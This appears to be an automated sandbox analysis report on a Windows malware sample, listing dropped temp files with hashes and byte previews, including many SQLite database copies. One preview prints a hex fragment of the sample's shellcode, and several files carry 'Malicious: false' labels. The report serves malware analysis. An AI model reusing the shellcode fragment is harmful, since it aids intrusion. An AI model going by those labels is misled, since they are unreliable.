Malicious:	false
Reputation:	low
Preview:	...0OG4OAICT..3E.CVNY9SF.0F16JMV00LG4OEICT513EWCVNY9SFZ0F16J.V00BX.AE.J...2..b.&0Js6(_!CW'm5Q^"(@o',c&@_.,9c....>)>Uh<;@iV00LG4O..CTy00E..Z.Y9SFZ0F1.JOW;1\|G4;DIC\513EWCh.X9SfZ0F16JMVp0Lg4OEKCT113EWCVN]9SFZ0F16.LV02LG4OEI@Tu.3EGCV^Y9SFJ0F!6JMV00\G4OEICT513E..WN.9SFZ.G1.NMV00LG4OEICT513EWCV.X9_FZ0F16JMV00LG4OEICT513EWCVNY9SFZ0F16JMV00LG4OEICT513eWC^NY9SFZ0F16JEv00.G4OEICT513Ey736-9SF.CG16jMV0DMG4MEICT513EWCVNY9sFZPhCE8.V00.C4OE.BT573EW5WNY9SFZ0F16JMVp0L..= %,751?EWCV.X9SDZ0FM7JMV00LG4OEICTu13.WCVNY9SFZ0F16JMV..MG4OEI.T511ERC..Y9c.Z0E16J.V06LG4OEICT513EWCVNY9SFZ0F16JMV00LG4OEICT513EWCVNY9HvS0f26JLV0!?F4OOCA613ArnAh';SF^.@!6JK%20LM..FICP.03E\|,RNY3X~.2F11%HV0:[P-.MICU.',O.JVNX..L[0B.0JM\C7LG>.`^].<13Dr.TOY={@Z0LB1JM\..TZ.FEIBq.62ESkPNY3 AZ0L..KLV6_DG4EIq.V51!G.JVNS4 OZ0@"29aW06_B%K;CCT?L2EWG(DY9YU\!B8EAMV:.@G4EDCT?L2EWGGJ"8SF^/I.?JMW..^F4KmOCT?B4EWI9@Y9Yj@..86JLs..LG0gCIC^F63E]PPe.0Lx.9F17o..00Ho2OEC0S5197VCV>'3SFP.I16@eF00F(:OECnZ$5HDWCRf]8S@q<W5MKMV4.OF4IVORR. 3E]y.OY9B@L_T16@^^"8dT4OO&

C:\Users\user\AppData\Local\Temp\aut13C0.tmp

Download File

Process:	C:\Users\user\Desktop\b3u71vBG0u.exe
File Type:	data
Category:	dropped
Size (bytes):	79978
Entropy (8bit):	7.912124781251231
Encrypted:	false
SSDEEP:	1536:ZEgnoNAibgXZs/CEMFCtRBQ1Q8aciwfIh93Y1GhuVNYH7ut:ZJnoNABvEMFqRe3EwO93uVEg
MD5:	6AC263E637540A51C7EC77095E6EB38D
SHA1:	979F12E57DD3DA0772DB830EBCE1F5C183747D19
SHA-256:	E74EF457AF291610AFB6C315B80BCB6F9861A7A411F3F744FA3FAF1273D4DF9F
SHA-512:	47977715357CCC597CB5D16E8AB5823A4D2F1D2EAB3554987A78C0317995689153F4F15870F26CA2B495FFF6D4881933D962F76134F12E3DDF6138613317C5EC
Malicious:	false
Reputation:	low
Preview:	EA06..~..C4..}.iO..huNW:gE.......F.L(....V.L).....x..ftZ...k@..4.x.V1../....bfP...&.R.siE~CC...Z.zE(.[......_..'68.....Jg.[D.w@..-f+.../3.....o....S...4..)4:...-....f.x.6.p.S,.....T..Kf..-.U2.0..Zb.T..&tZ=..^.ZiS.4..K......5zt8...Q.>.p....Nk......@..+-^.^.....0.A..;y.......=C..f...M..).._..Z.Z(tY..h.P...M..5....Z......A.S...Y7..g........l..[..fpp.O.!....P...cE.P.^.....L(...:.0..x....].s.4.mJ..$3.4.O..eSi..r.Pm.y.N.^.P.a.\.e0.Sb<.5&.P..&t[.N......1..i.i..P....V!'.S.T..:....+s..faJ..(sze.}.W.....gD.d.....@.L).)....+[.5..B..f.-N.P.Z$....'....j...4..n0Z..c!.......AO.L(.)...W.M..)-.wC..'....G.Q+3..V.!.N(..mZu...... ........H..w..U6...W..J]...<P..Z.&s@.<-T.w.p..\...e.ag..hu.4.gE...X..x..h....;..L)...>.C.T....C.O..:......f..-.a0.J'@...$..(.z.J.].T....^kM..j.H.>.4....v@..^`....@.W...z.".Y.0..T...T:.Rs[..-...w%.W*T....G.P.Ri........:-..0...1k-Ra0.....{.]..fV..r..H@%.!..^.Hf...n.D..h....Uu.U........S&3jd...hNf..-6.y.E.p.Ca_.T....t.X.u...e.9K..m...

C:\Users\user\AppData\Local\Temp\aut13FF.tmp

Download File

Process:	C:\Users\user\Desktop\b3u71vBG0u.exe
File Type:	data
Category:	dropped
Size (bytes):	9878
Entropy (8bit):	7.595803258551879
Encrypted:	false
SSDEEP:	192:65jwEiqiSLLhK6mXmHAMo0XrFZbHuAAAGVp200bAsmIr+C3VfuOfu36/sLGPF9C7:I6qin6OZ70XrFZbsp200csmIr+C31fIf
MD5:	33B02492281B84AAF805EB88202EBF4F
SHA1:	84CC0DBE32C6241B6A1B8F9621ED5450E247E578
SHA-256:	6369E06E6A3E2495442D98898CFA8D51FCB272B4A54F8818E5A5804F0F029C05
SHA-512:	9E32E8CC0DAFD0905908B8515EFC0BC28863E28C576C6CC9345C1E1E22082338F9AAE5D5EBB506ACB38105EC95411130869FC9D7BAEAE56D74CDBB4AD01ECE3F
Malicious:	false
Reputation:	low
Preview:	EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........\|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.\|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.\|........}S{....7...\| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i\|v)....b.h.,@..%........9....c...\|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@

C:\Users\user\AppData\Local\Temp\brontothere

Download File

Process:	C:\Users\user\Desktop\b3u71vBG0u.exe
File Type:	ASCII text, with very long lines (28756), with no line terminators
Category:	dropped
Size (bytes):	28756
Entropy (8bit):	3.5951956499437543
Encrypted:	false
SSDEEP:	768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbCO+IFh6q84vfF3if6g1:miTZ+2QoioGRk6ZklputwjpjBkCiw2RW
MD5:	DAACD4A278B38B990E87D30142501A33
SHA1:	2A023A5DD8A12720D750B840EDF59F1106CF97A8
SHA-256:	423A70F3606D0D0F96D2F932614A2125DAD3FF3170E2F04FF4BC3CEF82BD57CD
SHA-512:	6A1CCA832F6F54E88369752868CC5F867A03BB10EBFCE0AAA1C5A0A15A70A7458F3D88CFFF36E71A0C3096A4255ECCF824DD6AEC3709A2E9900F3D1F23D4853F
Malicious:	false
Reputation:	low
Preview:	8D6804F867D7E3ED21599F86932DA5673082A29A59B06B261C54E6F1DF089BBB368C973697738FDC880x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

C:\Users\user\AppData\Local\Temp\tmp10D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp209C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp20AC.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp20BD.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp20BE.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp20CF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp20D0.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp37AE.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp37AF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5927.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5937.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5948.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5958.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5969.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp597A.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp598A.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6E41.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\Temp\tmp6E42.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
